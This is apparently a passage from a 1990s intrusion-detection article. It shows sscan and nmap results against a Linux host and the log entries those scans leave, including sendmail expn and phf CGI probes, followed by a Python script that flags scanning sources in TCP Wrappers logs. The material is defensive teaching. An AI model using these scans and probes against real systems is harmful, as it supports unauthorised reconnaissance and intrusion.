--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *

Nmap represents the "raw data" tool set.
It doesn't tell you what vulnerabilities exist; rather, it tells you what ports are open, and you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap run against the same system.

otto #nmap -sS -O 172.17.6.30
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
53      open        tcp       domain
70      open        tcp       gopher
79      open        tcp       finger
80      open        tcp       http
109     open        tcp       pop-2
110     open        tcp       pop-3
111     open        tcp       sunrpc
143     open        tcp       imap2
513     open        tcp       login
514     open        tcp       shell
635     open        tcp       unknown
2049    open        tcp       nfs

TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand how the tools work.
First, an sscan will log as follows (this is a default scan with no modifications to any config files):

/var/log/secure
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200

/var/log/maillog
Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200]
Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200]
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root

/var/log/messages
Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed

sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd; you will find them in access_log. I decided to include them anyway for your edification :)

/var/log/httpd/access_log
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
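Both log signatures described above, the single-port sweep across many hosts from the Pattern Matching section and the many-services-on-one-host burst that sscan leaves in /var/log/secure, can be told apart automatically on the log server. The script below is an added example (not code from the articles or their author): it parses TCP Wrappers "connect from" lines and classifies each source address; the sample log lines and the thresholds are constructed for the example.

```python
"""Spot the two scan patterns the articles describe in central syslog: one
source hitting one service on many hosts (an exploit scan) and one source
hitting many services on one host (an all-purpose scanner such as sscan).
Added example; the sample lines are constructed in TCP Wrappers format."""
import re
from collections import defaultdict

# TCP Wrappers entry as written to /var/log/secure:
# "Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200"
LINE_RE = re.compile(
    r"^\w{3} +\d+ [\d:]+ (\S+) (\S+?)\[\d+\]: connect from (\S+)$")

SAMPLE_LOG = """\
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 brahms in.ftpd[6613]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 10.0.0.7
Apr 14 19:18:56 mozart imapd[11635]: connect from 10.0.0.7
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 10.0.0.7
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 10.0.0.7
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 10.0.0.7
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [10.0.0.7]: expn root
Apr 12 08:01:00 bach in.ftpd[7001]: connect from 10.9.9.9
"""

def parse(log):
    """Yield (host, service, source) for each 'connect from' line;
    lines in other formats (e.g. the sendmail entry) are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groups()

def classify(log, min_hosts=3, min_services=3):
    """Return {source: verdict}: 'exploit-scan' when one service was touched
    on >= min_hosts distinct hosts, 'multi-service' when >= min_services
    services were touched on a single host, otherwise 'ordinary'."""
    by_service = defaultdict(lambda: defaultdict(set))  # src -> svc -> hosts
    by_host = defaultdict(lambda: defaultdict(set))     # src -> host -> svcs
    for host, service, source in parse(log):
        by_service[source][service].add(host)
        by_host[source][host].add(service)
    verdict = {}
    for src in by_service:
        if any(len(h) >= min_hosts for h in by_service[src].values()):
            verdict[src] = "exploit-scan"
        elif any(len(s) >= min_services for s in by_host[src].values()):
            verdict[src] = "multi-service"
        else:
            verdict[src] = "ordinary"
    return verdict
```

Running classify(SAMPLE_LOG) flags 192.168.11.200 as an exploit scan and 10.0.0.7 as a multi-service probe, while the lone connection from 10.9.9.9 stays ordinary; feeding it the real /var/log/secure from the log server works the same way.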